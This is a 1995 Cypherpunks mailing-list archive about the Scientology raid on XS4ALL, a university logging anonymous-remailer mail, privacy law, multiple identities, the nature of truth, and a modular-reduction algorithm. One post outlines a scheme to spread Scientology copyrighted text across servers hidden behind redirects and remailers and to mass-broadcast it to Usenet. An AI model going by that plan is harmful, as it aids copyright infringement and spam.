the opinion that we need to a pre-emptive crypto strike. But just as the 'Privacy Card' has been debated here endlessly, so too reaching critical market mass w/a 'bump in the cord' product. David Neal - GNU Planet Aerospace 1-800-PLN-8-GNU Unix, Sybase and Networking consultant. "...you have a personal responsibility to be pro-active in the defense of your own civil liberties." - S. McCandlish From gjeffers at socketis.net Wed Sep 6 20:44:26 1995 From: gjeffers at socketis.net (Gary Jeffers) Date: Wed, 6 Sep 95 20:44:26 PDT Subject: ON OFF-TOPIC Message-ID: <199509070639.BAA00416@mail.socketis.net> ON OFF-TOPIC THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY! CRYPTO CODERS SUPPLY THE MEANS! CONSPIRACY THEORISTS SUPPLY THE MOTIVATION! conspiracy theorist = alternative political theorist NOT= AP/ABC/CBS/NBC/CIA/FBI/U.S GOV'N./New York Times/Washington Post opinion moulders syndicate "extremist right-wing kook" = old fashioned American patriot Left term used often by left-wing extremist liberal statist kooks. The United States "Federal" Government - we'll be even more American without it. PUSH EM BACK! PUSH EM BACK! WWWAAAYYYY BBBAAACCCK! BBBEEEAAATTTT STATE!  From rjc at clark.net Wed Sep 6 20:46:27 1995 From: rjc at clark.net (Ray Cromwell) Date: Wed, 6 Sep 95 20:46:27 PDT Subject: Scientology and police visit XS4ALL Amsterdam In-Reply-To: Message-ID: <199509070346.XAA14571@clark.net> Anyone ready to risk running a "Scientology .sig virus server"? Here's the idea. The CoS apparently freaks out and sues anyone who distributes CoS material, even those who quote small portions of it. In the same spirit of the "export-a-sig-PGP" system, why not break the CoS materials up into n pieces (each piece being 5-10 lines long) and let people request chunks from a server to put in this .sig? The assumption is, the Church can't sue everyone (legal funds being limited). I think I'd do it just to piss them off. To spread the risk around even more, I'd place the "piece server" on k different HTTP sites just so they can't raid them all. Even better would be to use a script on one master server to dynamically return HTTP redirects to k different URLs to the real servers. Another option is dynamic DNS. Finally, you could have the server run thru email via a chained anonymous return block. The result would be sent back thru a remailer chain. The nastiest thing I can think of is to get the CancelBot people to let a massive broadcast of CoS materials be sent to UseNet. Other options include servers which detect known CoS source addresses and provide "fake fronts" to them. (easily doable with CGI/CERN server and IDENT). Cypherpunks oughta be able to figure out something to show those idiots why their actions are ultimately futile. -Ray From mark at lochard.com.au Wed Sep 6 20:49:19 1995 From: mark at lochard.com.au (Mark) Date: Wed, 6 Sep 95 20:49:19 PDT Subject: Scientology and police visit XS4ALL Amsterdam In-Reply-To: Message-ID: <199509062303.AA24688@junkers.lochard.com.au> >> This is the second or third time I've seen descriptions of such >> raids where cult (no, I'm not trying to be diplomatic) >> representatives were present and participating. Is this legal in >> Amsterdam? How about in the U.S.? Britain? >> >Probably. Amsterdam isn't exactly the wild west, and they didn't take the >computer equipment with them, they just inventoried everything so to have >something to sell when their claims prove valid. Which I doubt (shit, I >will be moving to this country in a couple of weeks...) The good news is xs4all were prepared for them and have mounted a publicity campaign against co$. co$ has withdrawn their complaint (though xs4all have not be _officially notified yet) in an attempt to patch up things but it's too late for co$ to save them from the wrath. xs4all has a lot of support in all facets of .nl life so co$ is going to have a bad time screwing with them. From what I learnt there will be a lot of noise RSN in the press. My personal view is co$ deserves all the flak they get. Mark mark at lochard.com.au The above opinions are rumoured to be mine. From unicorn at polaris.mindport.net Wed Sep 6 20:52:21 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Wed, 6 Sep 95 20:52:21 PDT Subject: University logging mail to anon.penet In-Reply-To: <199509070230.TAA24609@goblin.punk.net> Message-ID: On Wed, 6 Sep 1995, Jeff Simmons wrote: > This just came up locally, and I'd like to have some comments on it, > especially from people who understand the law a lot better than I do: > > Our local University apparently has been logging ALL mail to anon.penet, > including faculty, students, and off-campus users. > > They maintain such weak security that someone was able to "obtain" > the logs and post them to a local usenet group, thus compromising > everyone's "anonymous" identities. Which University please? > > -- > Jeff Simmons jsimmons at goblin.punk.net > From damion.furi at the-matrix.com Wed Sep 6 20:59:29 1995 From: damion.furi at the-matrix.com (DAMION FURI) Date: Wed, 6 Sep 95 20:59:29 PDT Subject: Collection of persona In-Reply-To: <8B094A8.000504D4D8.uuout@the-matrix.com> Message-ID: <8B0951B.000504D5AC.uuout@the-matrix.com> BU|In fact it's not difficult. It's quite simple to estlablish new identity |for the individual willing to risk the charges and consequences of |exposure. The basic impediment is time. Good credit doesn't come |overnight. The second impediment is tax evasion- which is less than |justifiable in the United States on the grounds of privacy. If you're |willing to be patient, and pay taxes on more than one name, its easy to |maintain several identities. A lot of "ifs" there. Not to mention the expense. BU|> If it were possible to have an alias in real |> life, as easy as it is to get one on the 'net that is, then I would most |> certainly do so.. BU|Which tells me how serious you really are about your privacy. You have |made a decision here about how much trouble privacy is worth to you, |which is "not much." And how many "real names" do you have off the net? BU|I hear people bitch about privacy endlessly. Privacy helps those who |help themselves to privacy. I think Mr. May was precisely correct in saying |that it is so much easier and simpler for one to rely on self privacy |insurance rather than government privacy insurance. Certainly. That doesn't mean that we're all going to jump up and maintain several aliases. Particularly when our beloved Uncle Sam is quite capable of deciding that it's for fraudulent purposes -- which makes it a felony. It would be simpler and easier to start another revolutionary war than follow your logic. :----------:----------:----------:----------:----------:----------:----- : furi at the-matrix.com | pgp-public-key at demon.co.uk | LIVE LION ALERT : 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0 F7 E9 67 1F AF B8 2D 94 PGP: When it's none of their damned business. -- SPEED 1.40 [NR]: Evaluation day 133... From hayden at krypton.mankato.msus.edu Wed Sep 6 21:02:31 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Wed, 6 Sep 95 21:02:31 PDT Subject: University logging mail to anon.penet In-Reply-To: <199509070230.TAA24609@goblin.punk.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 6 Sep 1995, Jeff Simmons wrote: > This just came up locally, and I'd like to have some comments on it, > especially from people who understand the law a lot better than I do: > > Our local University apparently has been logging ALL mail to anon.penet, > including faculty, students, and off-campus users. > > They maintain such weak security that someone was able to "obtain" > the logs and post them to a local usenet group, thus compromising > everyone's "anonymous" identities. I'd say that there are some serious ethical and legal concerns that should be addressed by the administration for keeping such logs... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.2 iQCVAwUBME5SwjokqlyVGmCFAQGuLQP/TA9F2Vf65o37Yq821zFfBB8HNekfdB6I PcmaRPHFzlgGfV2iSQm4sn0KHLddpX70ZrUaGM2uuJsYC1iwPagGOQR0Y51tjU7Y 1O+jBf3Pjsa64rox1Y5+7fQAnl4hD5Io13MtsosDC19kjPYuoJ33RHWF/uiHRT5N stRLLxwWjEo= =MQuw -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ Finger for Geek Code Info <=> Finger for PGP Public Key \/ / -=-=-=-=-=- -=-=-=-=-=- \/ http://krypton.mankato.msus.edu/~hayden/Welcome.html -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+ K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++** ------END GEEK CODE BLOCK------ From Jaeson.M.Engle at dronf.org Wed Sep 6 21:06:09 1995 From: Jaeson.M.Engle at dronf.org (Jaeson Engle) Date: Wed, 6 Sep 95 21:06:09 PDT Subject: ULC Online Message-ID: Just in case anyone else wants to go ahead and get ordains in the ULC, http://ybi.com/ulc/ordain.html Online form for getting ordained. Jaeson -- Jaeson M. Engle http://www.dronf.org Coordinator of the Jourvian Group PGP Mail Encouraged -> jme.pub.key at dronf.org Project List -> programs at dronf.org From robl at on-ramp.ior.com Wed Sep 6 21:11:15 1995 From: robl at on-ramp.ior.com (Rob Lowry) Date: Wed, 6 Sep 95 21:11:15 PDT Subject: Collection of personal info In-Reply-To: Message-ID: > Nor was I suggesting a legal solution (I know your comment > was triggered by Rob's request for legal recourse) but instead > suggesting that things are farther along than some people realize. Nor do I support additional rules/laws or regulations.. but if there are existing ones to screw with, use 'em.. Recently I had a bill turned over to collections from, of all places, the daycare we used to take our kids too.. we owe them about $1300 in their estimation. The reason we have not paid is due to 11 days of lost work due to head lice that they provided to my kids, plus they stopped serving breakfast which was in the contract we signed when enrolling the kids there.. I was notified by the collection co. about this submittal (now $1500 for some reason..) and by law, I can dispute this in writing, thus slowing the wheels of the collection monster horribly. I did so.. and for the last 4 months, they have been trying to prove I owe money.. I was asking if such a system exist for the release of your credit info.. and it appears that there is no safety mechanism in that monster. Rather than cry out for more laws to be twisted against us later, I agree that letting it happen, and using cash instead of credit, is the smart answer here. Someone care to point me at e-cash info? sounds interesting.. remember, I am new to the crypto scene and still think PGP is neato ;) From rsnyder at janet.advsys.com Wed Sep 6 21:53:31 1995 From: rsnyder at janet.advsys.com (Bob Snyder) Date: Wed, 6 Sep 95 21:53:31 PDT Subject: University logging mail to anon.penet In-Reply-To: Message-ID: <199509070454.AAA19936@janet.advsys.com> hayden at krypton.mankato.msus.edu said: > I'd say that there are some serious ethical and legal concerns that > should be addressed by the administration for keeping such logs... Ethical I would definately agree with. Legally, I'm not so sure of. The applicable law would appear to be the Electronic Communications Privacy Act of 1986. The law does allow administrators to see messages in the normal course of their job, as long as they don't reveal that information to a 3rd party (except law enforcement in the event of a criminal act) This protection is probably strongest with a company you purchase Internet Service from, probably lesser so with a University, since there is less obviously a customer/seller relationship, and almost non-existant with a business, since there isn't a customer relationship, and the systems are owner by the business. Bob From ravage at einstein.ssz.com Wed Sep 6 22:01:44 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Wed, 6 Sep 95 22:01:44 PDT Subject: Collection of personal info In-Reply-To: Message-ID: <199509070507.AAA01347@einstein.ssz.com> > > Doesn't make it true, in Tim's sense--just makes it verifiable. > > MacN > > On Wed, 6 Sep 1995, Jim Choate wrote: > > Truth is that which can be verified to be reproducable by indipendant and > > unbiased parties. All else is opinion. > What exactly is Tim's sense to you? Perhaps Tim could clarify more clearly what he means by 'truth'. To me it sounds like he is saying that there is some viewpoint that is absolute. I no more believe in absolute viewpoints than I believe in absolute coordinates. If it is the 'truth' what makes it unverifiable? If I can look at it and claim it isn't the truth (because I can't verify it) how does one know it is the truth then? What seperates this unverifiable truth from opinion (which is equally unverifiable by definition)? What is the litmus test? And how do we know the litmus test is true? (I see a circle coming up) For example, lets say that I have a accident with another motorist. We each tell our story but they are different (or the same for that matter). Which is true? I would hold neither. The incident as described by either of us is simply our recollection of happenstance, in other words our opinion of what occured. It is not what occured. The only truth that could be derived would be that an accident had occured. Why? Because we would have two bent cars that anyone who cared enough could verify. The truth is not some mighty sword we can wield to reveal some shrowded mystery. It is the realization that the world is a complicated place and we deal with incomplete facts (ie fog of war). From this meager litany of facts we try to derive some conclusion that allows us to control our environment. Truth is a mundane everyday sort of thing, not some magical force. The truth will not free you nor will it guarantee a better tomorrow. The whole argument breaks down to the simple question of whether it is possible to know anything absolutely. If it is possible to know something absolutely what else to call it but fact (and therefore true)? If it isn't a fact then it is either a lie (ie the inversion of truth) or else an opinion. I don't see how there can be any other division than these three. Another way to look at it is to say that if it involves faith it can't be truth. Truth can't be dependant on faith (ie observer). [Looking over this I realize that we are talking about a form of computability] From tcmay at got.net Wed Sep 6 22:46:01 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Sep 95 22:46:01 PDT Subject: What is truth? Message-ID: At 5:07 AM 9/7/95, Jim Choate wrote: >> >> Doesn't make it true, in Tim's sense--just makes it verifiable. >> >> MacN >> >> On Wed, 6 Sep 1995, Jim Choate wrote: >> > Truth is that which can be verified to be reproducable by indipendant and >> > unbiased parties. All else is opinion. >> > >What exactly is Tim's sense to you? Perhaps Tim could clarify more clearly >what he means by 'truth'. To me it sounds like he is saying that there is >some viewpoint that is absolute. I no more believe in absolute viewpoints >than I believe in absolute coordinates. I promise to be mercifully brief. This is a subject that we could all go on and on about. I used the ironic "What is truth?," a la Pilate, to indicate some degree of ambiguity. How Jim concluded that I have some absolutist viewpoint from this simple line is unclear to me. In any case, I don't believe there are "independent and ubiased parties" who can determine what truth is. Not that there is no measure of truth. I am no solipsist, and I believe we have a much clearer view today of how things work than we had, say, 500 years ago. Courtesy of science and the core idea of falsifiability. As this view relates to government and law, it is that many things are best left outside the bounds of the law. The law stays out of most inter-family disputes, for example, unless violence or fraud of a major sort occurs. And the law stays out of confirming or refuting religious claims. If Preacher Bob says that praying to Baal will save one's soul, no law officer will step in and stop this "lie." As I like to put it, of the N different religions, at most _one_ of them is "true," and the other N - 1 are based on lies. So, if we are to "allow" religious freedom we must surely allow lies to be told. Q.E.D. Our liberal, Western society went through this debate a long time ago, and it was pretty much concluded that people could choose their own paths to hell without interference from others. That people were free to believe any damned fool idea they wanted to believe in. Somewhere along the line we've adopted the new view that government needs to correct all incorrect thoughts, needs to protect people from "hurtful" ideas and speech, and needs to determine what is true and what is not true. If you want more information on my views about truth, check out the work on "evolutionary epistemology," especially the writings of William Bartley and Karl Popper. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From rrothenb at ic.sunysb.edu Wed Sep 6 22:50:15 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Wed, 6 Sep 95 22:50:15 PDT Subject: ECPA (Was: University logging mail to anon.penet.fi) In-Reply-To: <199509070454.AAA19936@janet.advsys.com> Message-ID: <199509070542.BAA23214@libws4.ic.sunysb.edu> Bob Snyder wrote: > hayden at krypton.mankato.msus.edu said: > > I'd say that there are some serious ethical and legal concerns that > > should be addressed by the administration for keeping such logs... > > Ethical I would definately agree with. > > Legally, I'm not so sure of. The applicable law would appear to be the > Electronic Communications Privacy Act of 1986. The law does allow > administrators to see messages in the normal course of their job, as long as > they don't reveal that information to a 3rd party (except law enforcement in > the event of a criminal act) I'm no lawyer, but I believe that technically the ECPA allows them to view mail when it is part of maintenance, which could be in the "normal course of their job[s]" but I think it means that if they see mail while maintaining (ie, bounced msgs) it's Ok to read it but maintenance doesn't mean outright monitoring of mail. Then again, what does the ECPA say about monitoring message traffic? That's essentially what they are doing, and likely they will rationalize it as being to save their own skins. It also might be the work of a SysAdmin and the school administration would be entirely clueless about it. Another possibility is that a hacker (the same who got ahold of the file?) put in something to monitor it... (my knowledge of Unix is little, though...) > This protection is probably strongest with a company you purchase Internet > Service from, probably lesser so with a University, since there is less > obviously a customer/seller relationship, and almost non-existant with a > business, since there isn't a customer relationship, and the systems are owner > by the business. I've heard some nasty stories about boards and a couple of I-Net providers who charge for access but reserve the right to throw someone off the system without refund (it's often in the terms of many account applications) for various no-nos. Rob From damion.furi at the-matrix.com Wed Sep 6 22:51:21 1995 From: damion.furi at the-matrix.com (DAMION FURI) Date: Wed, 6 Sep 95 22:51:21 PDT Subject: Collection of persona In-Reply-To: <8B09569.000504D5D6.uuout@the-matrix.com> Message-ID: <8B0A00E.000504D665.uuout@the-matrix.com> DM|Depends on the counter people. The local RS here the clerks don't care |much about it and will enter a random number. I wish they would do that here. I've just about yanked a manager over the counter over it. |A local Service Merchandise |does the same thing, but they're pesky, so I make up silly names to test |the wits of impatient teenage mutant cashiers. (They also used to have |a computer where you enter your telno. and place orders to pick up at |the desk... I don't think the system bills you automatically but the |employees probably won't like it when you have them get 10 wieght sets |out...) I love it when the system has a flaw I can take a crowbar to. :----------:----------:----------:----------:----------:----------:----- : furi at the-matrix.com | pgp-public-key at demon.co.uk | LIVE LION ALERT : 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0 F7 E9 67 1F AF B8 2D 94 PGP: When it's none of their damned business. -- SPEED 1.40 [NR]: Evaluation day 134... From msprague at owens.ridgecrest.ca.us Wed Sep 6 22:54:30 1995 From: msprague at owens.ridgecrest.ca.us (M. F. Pat Sprague) Date: Wed, 6 Sep 95 22:54:30 PDT Subject: Diskreet Disk Help Needed Message-ID: <199509070555.WAA11056@owens.ridgecrest.ca.us> One of my Diskreet Disks has refused to open but will change size and password. Any suggestions?? From jirib at cs.monash.edu.au Wed Sep 6 23:03:18 1995 From: jirib at cs.monash.edu.au (Jiri Baum) Date: Wed, 6 Sep 95 23:03:18 PDT Subject: Scientology and police visit XS4ALL Amsterdam In-Reply-To: <199509070346.XAA14571@clark.net> Message-ID: <199509070600.QAA11675@molly.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello Ray Cromwell and all other cypherpunks, > Anyone ready to risk running a "Scientology .sig virus server"? ... > In the same spirit of the "export-a-sig-PGP" system, why not break > the CoS materials up into n pieces (each piece being 5-10 lines long) ... I don't really follow the Co$ saga, but when I last looked it seemed as though six lines (one of them the title) are sufficient for them to be unhappy at you. If I remember correctly, those six lines said to go to the zoo to practice telepathy with animals... (No they didn't say *how*.) So I don't know whether the "export-PGP-sig" system will be any use. ... > To spread the risk around even more, I'd place the "piece server" > on k different HTTP sites just so they can't raid them all. Even > better would be to use a script on one master server to ... master server = single point of pressure > Cypherpunks oughta be able to figure out something to show those idiots > why their actions are ultimately futile. It always was, but do you have the money and the spirit to fight them? Jiri - -- If you want an answer, please mail to . On sweeney, I may delete without reading! PGP 463A14D5 (but it's at home so it'll take a day or two) PGP EF0607F9 (but it's at uni so don't rely on it too much) -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBME6KSyxV6mvvBgf5AQFGTQQAhxXbnoS1EoxRGTHKAukZzRIYFGu++Zuq 2zywwlKSUdxFm9di914qembuEb8rGTwqUGagESjs3p2oZe9xKFHricSr0LFOeoSh Vx+mioL1hEaBMzKBrMNAD4OA7lPi7EEzeEFSb589TgNqH5DBvYxMwfWNXCe5I/A1 WjHU0YqtiwU= =gKJF -----END PGP SIGNATURE----- >: : >>: OT7-48 >: : >>: 1. Find some plants, trees, etc., and communicate to them >: : >>: individually until you know they received your communication. >: : >>: 2. Go to a zoo or a place with many types of life and communicate >: : >>: with each of them until you know the communication is >: : >>: received and, if possible, returned. From alt at iquest.net Wed Sep 6 23:21:56 1995 From: alt at iquest.net (Al Thompson) Date: Wed, 6 Sep 95 23:21:56 PDT Subject: Are booby-trapped computers legal? Message-ID: At 03:38 PM 9/6/95 -0400, hallam at w3.org wrote: >People who go round drawing parallels to gun ownership and cryptography >ownership are simply playing into the governments hands. Which of our rights would you have us surrender so as to not play into the government's hands? >Cryptography has net benefits to society. You would have a hard time proving that cryptography has more, or different "net benefits to society" than gun ownership does. >Most advocates of gun ownership tend to convince me of >little more than they are a danger to society. Regardless of their case they are >the biggest argument for gun control, and therfore poor advocates of their >cause. Statists say the same thing about crypto-advocates. Talking about keeping secrets, and discussing which methods are uncrackable by the government is not what a statist wants to hear - and neither is talk about the real reason behind the 2nd Amendment. From vznuri at netcom.com Wed Sep 6 23:30:51 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 6 Sep 95 23:30:51 PDT Subject: Another Son of Clipper discussion paper In-Reply-To: <199509052053.NAA01226@mycroft.rand.org> Message-ID: <199509070612.XAA16340@netcom8.netcom.com> J.G. on "proposed escrow techniques": >In order to help make most productive use of the limited time >available at the upcoming meeting and to better focus >deliberation, the following criteria are being distributed for >discussion purposes. Since it is important that final criteria >be clear, straightforward, consistent, and implementable, please >review these draft criteria and be prepared to discuss >how they may be refined and made more specific. could someone explain to me why the passive voice is being used in this proposal? who is proposing this criteria? there is a saying "he who appeases an alligator does so in hopes of being eaten last". J.G., where did this list of proposal items come from? from you? are you a private researcher? if so, how do you justify this list? I mean, I can imagine someone from the NSA coming up with something this specific and restrictive, but frankly I find it in rather poor taste for private, unaffiliated researchers trying to bargain with the NSA. there is a clear-cut right to encryption in a free society, and anything less is a compromise with totalitarianism IMHO. IMHO no genuine self-respecting cypherpunk would be involved in any kind of discussions involving government key escrow, unless to go as an agent provocateur. the whole issue lends an "aura of legitimacy" to an issue that has absolutely none. its like the Perl shirt-- as I have said many times, as long as people argue about the precise legality of the code, they are *losing* the battle with the NSA and playing into their hand and exactly the kind of paranoia over cryptography use they are trying to cultivate. --Vlad Nuri From an116512 at anon.penet.fi Wed Sep 6 23:54:39 1995 From: an116512 at anon.penet.fi (an116512 at anon.penet.fi) Date: Wed, 6 Sep 95 23:54:39 PDT Subject: not a flame please read and think about this Message-ID: <9509070626.AA07408@anon.penet.fi> why is it that half the people who post here work for the government or big companies that are doing governments bidding (rand.org (which is part of the the nsa!) att.com (makers of the clipper chip) mit (which onwns rsa) netscape etc etc) what makes me wonder isnt so much that theyre here but that they post socalled reasonable stuff that supports the the government line. like when these people report on what the nsa guy says at the crypto convention as if were supposed to take it seriously and these people who say clipper is good enough no back doors. and then everyone takes this crap seriously. obviously the government thinks there are some things we shouldnt think about ourselves. and then someone comes along and says theyve thought about it already and we should just go mind our own biz. arent we supposed to be cypherPUNKS? than why do we need these people to think for us? honest replies only please. i dont mean to flame but this really bothers me. we should maybe think about a closed list. ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From ravage at einstein.ssz.com Thu Sep 7 00:31:53 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Thu, 7 Sep 95 00:31:53 PDT Subject: What is truth? In-Reply-To: Message-ID: <199509070729.CAA01800@einstein> > > I promise to be mercifully brief. This is a subject that we could all go on > and on about. I used the ironic "What is truth?," a la Pilate, to indicate > some degree of ambiguity. How Jim concluded that I have some absolutist > viewpoint from this simple line is unclear to me. > Actually from your statement I would conclude that you don't believe truth exists at all. That was the original in context intent of the quote you used. Ambiguity is like pregnancy, it is there or isn't. Bottem line being whether your position is that there is or isn't an absolute it falls to the same line of argument...faith. My personal opinion is that we are way to ignorant/stupid to ever answer the question. > In any case, I don't believe there are "independent and ubiased parties" > who can determine what truth is. Not that there is no measure of truth. I > am no solipsist, and I believe we have a much clearer view today of how > things work than we had, say, 500 years ago. Courtesy of science and the > core idea of falsifiability. > This is exactly the opinion of the great minds of their time as well. I suspect you are just as wrong as they were. If this isn't solipsism I don't know what is. We are no valid measurer of our ignorance. We are simply to close to see where the horizons truly are. The catch here is we will always be to close. The real issue is not whether there is an observer who can discern the truth but rather; is there a truth to discern in the first place? > > And the law stays out of confirming or refuting religious claims. If > Preacher Bob says that praying to Baal will save one's soul, no law officer > will step in and stop this "lie." As I like to put it, of the N different > religions, at most _one_ of them is "true," and the other N - 1 are based > on lies. So, if we are to "allow" religious freedom we must surely allow > lies to be told. Q.E.D. > You are confusing 'lie' and 'opinion'. No religion is true, they are based on faith and therefore unprovable. That which is unprovable is neither truth or lie, it simply is. > > Somewhere along the line we've adopted the new view that government needs > to correct all incorrect thoughts, needs to protect people from "hurtful" > ideas and speech, and needs to determine what is true and what is not true. > Who is this 'we' kimo-sabi? If this were true 'we' wouldn't even be having this discussion. As to it being a new idea, hardly. > "evolutionary epistemology," especially the writings of William Bartley and > Karl Popper. > Read some of them, believe they are as full of shit as all other philosophers when taken as a whole. While individual ideas that these folks have presented have quite a bit of merit as a whole not a single philosopher has ever produced a work that has really been ground shattering. You disagree? Then explain why no philosopher has managed to over shadow all the others? {And for those Christians out there who will invariably send me mail, Christianity is not the largest religion in the world, only in the US does it hold a numerical superiority.} The reason is quite simple and one of the main problems with philosophers and politicians. They keep making the same damn mistake, they assume that since it works for them it will work for anyone (and therefore everyone) else. This is an incorrect assumption. The real problem with philosophers and politicians is that at some point they start to believe their own press releases. Consider this, if 'truth' is so hard to define or observe why is there not a equaly biased discussion about 'lie'? Few people have a problem with the concept of a lie. We can argue blissfully for centuries over what truth is but if we question what a lie is we get termed pathological. What is it about human psychology that causes this? Take care. From rjc at clark.net Thu Sep 7 01:14:50 1995 From: rjc at clark.net (Ray Cromwell) Date: Thu, 7 Sep 95 01:14:50 PDT Subject: fast modular reduction In-Reply-To: <199509070157.VAA16973@clark.net> Message-ID: <199509070811.EAA07559@clark.net> I wrote: > modifications. Is there an algorithmic analysis available? I also > I think there is a bug in your description. Let k+1 = n+1 > (e.g. the dividend is 1 more "block" than the modulus). Then > i=n starting out, and we have Upon a closer look, I see there's no mistake. The algorithm will never reach k=n because the loop stops at n+1. Anyway, I played around with the algorithm a little, and it's neat and easy to implement, but the speed increase is not worth the patent hassle (assuming there is a speed increase, I saw none) The algorithm is still basically O(n^2) if used in a modexp routine. It requires n^2 multiplications and additions. Whereas, a typical Karatsuba multiplication using a high precision reciprocal will only use 2*n^1.5 multiplications and 5*n^1.5/8 additions. (for n=64 which is a 2048-bit number being reduced, it's about 1/5 the multiplications, but 5 times the additions) Two other possible algorthms are: Let P(x) = sum(i=0 to n-1) a_i x^i be a multiprecision integer radix x. If m is a modulus, of length n/2, rewrite P(x) as sum(i=0 to n/2-1) a_i x^i + x^(n/2) (a_{n/2 + i} x^i) break the summation into two parts. Focus on the second term. (both terms are not equal, or one digit larger than the modulus) Perform modular reduction of the right hand polynomial using Horner's method x*(x*(x*...(x*a_i + a{i-i} mod m)mod m)mod m) Those internal mod m's can be done quickly with a 2-digit trial quotient estimation. It's still O(n^2), but might be quicker. Still another technique.. Rewrite P(x) (a_0 + a_2 x^2 + a_4 x^4 + ...) + x (a_1 + a_3 x^2 + a_5 x^4 + ...) [broken into two Polys with odd and even terms) Factor out x^2 out of each piece and write a_0 + ((a_2 + a_4 x^2 + a_6 x^4 + ...)*x^2) + x*(a_1 + x^2*(a_3 + a_5 x^2 + a_7 x^4 + ...) Now keep applying the recursive rule until the length of the poly pieces are the same or smaller than the modulus. Now, start evaluating from the inner layers. Multiply each piece by x^2 (two shifts), and take the mod. Sum the results, shifting one side by 1 (for the x factor). Shifts are free because an array representation yields a shift with a pointer movement. It looks kinda like the method for evaluating FFTs a little bit, but it's not. Just something off the top of my head just now. (I hereby place it in the public domain assuming it's worth anything, no patents please) I think with a clever implementation, you can trade some mults for more adds, but still use less additions than russian peasant. -Ray From Saitmacher at MSMDSTTF.frankfurt.hoechst-ag.d400.de Thu Sep 7 01:26:57 1995 From: Saitmacher at MSMDSTTF.frankfurt.hoechst-ag.d400.de (Saitmacher, Klaus, Dr., DyStar) Date: Thu, 7 Sep 95 01:26:57 PDT Subject: subscripe Message-ID: <000C8D27.MAI*/S=Saitmacher/OU=MSMDSTTF/O=FRANKFURT/PRMD=hoechst-ag/ADMD=dbp/C=de/@MHS> subscripe From greg at ideath.goldenbear.com Thu Sep 7 01:31:22 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Thu, 7 Sep 95 01:31:22 PDT Subject: University logging mail to anon.penet Message-ID: <199509070815.AA00296@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Jeff Simmons writes: > This just came up locally, and I'd like to have some comments on it, > especially from people who understand the law a lot better than I do: > > Our local University apparently has been logging ALL mail to anon.penet, > including faculty, students, and off-campus users. With respect to logging of student traffic, I'd look at the Family Education Rights Privacy Act ("Buckley Amendment", 20 USC 1232g) and the California analog to it (assuming one exists; Oregon's is located at OAR 571-20-005, et seq.). The release of information about individual students beyond "directory information" (e.g., name, dates of attendance, degrees granted, etc) is sharply limited without the consent of the student. Information about mail traffic sent and received is, IMHO, arguably (but not clearly) within "educational records" for FERPA purposes. To establish a Buckley Amendment violation (and I'm not saying there was one here) you'll still need to find a University employee to pin the disclosure on. If it's a University employee who posted them to the newsgroup, it's easy. If the University employee merely maintained those records in a place where an outsider was able to easily gain access to them, it seems like a bigger stretch. I had occasion to talk with a relatively high-level administrator in the University of Oregon's computer center some time ago and he explained that they've had to go to some trouble to make sure that gopher/WWW directories and other contemporary university computing practices don't fall afoul of the Buckley Amendment. Perhaps the powers that be at other places aren't quite so forward-thinking (or don't have the questionable benefit of being next door to a building full of law students with time on their hands). Perhaps an even longer stretch would be an argument that the practice of logging (and of keeping those logs in an insecure place) violates students (and others') right to privacy. Federal protection for a "right of privacy" is fickle, but California protects its citizens' right to privacy in its constitution. (I'm not an attorney (yet), don't live in California (right now) and consequently don't know much about CA law. So please think about this message as maybe a hint in (I hope) a useful direction, not necessarily the right answer. Feh.) This concrete issue seems like a good reminder of the implications of the way that we think about "cyberspace" and the things that happen when we use computers. If one thinks about a machine or a network as "public space", logging or reporting activities which happen there (e.g., Alice walks over to visit Bob, leaving footprints everyone can see in /var/adm/syslog) seems reasonable or at least not offensive, and it seems silly to talk about being angry because someone wrote down what everyone could see. But if we think about machines and networks as being private space, reporting on what Alice and Bob do seems tacky and rude at best, and horrifying (and likely to create liability) at the other end of the spectrum. As much as I dislike the "cyberspace" metaphor, its use or misuse has serious consequences. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBME6qJH3YhjZY3fMNAQHiQgP9HjqkwOzMabzXXbUKp0W7c2MAn4na5X1X UPVY8p70abNVpPoVFGQTUpgBnv3hBy40n5RFD9pNM7c2UPwq0C8Tcir9TBr+xEH7 L7iQCjsqIK5F1lv66C5yMFu8wfiRF10hMhTJYthOa04dyP10HovT2QameGw+DZHJ og1t7owgcco= =D5PV -----END PGP SIGNATURE----- From perry at piermont.com Thu Sep 7 01:37:22 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 7 Sep 95 01:37:22 PDT Subject: ON OFF-TOPIC In-Reply-To: <199509070639.BAA00416@mail.socketis.net> Message-ID: <199509070834.EAA04213@frankenstein.piermont.com> Was this really needed? Gary Jeffers writes: > ON OFF-TOPIC > > THE UNITED 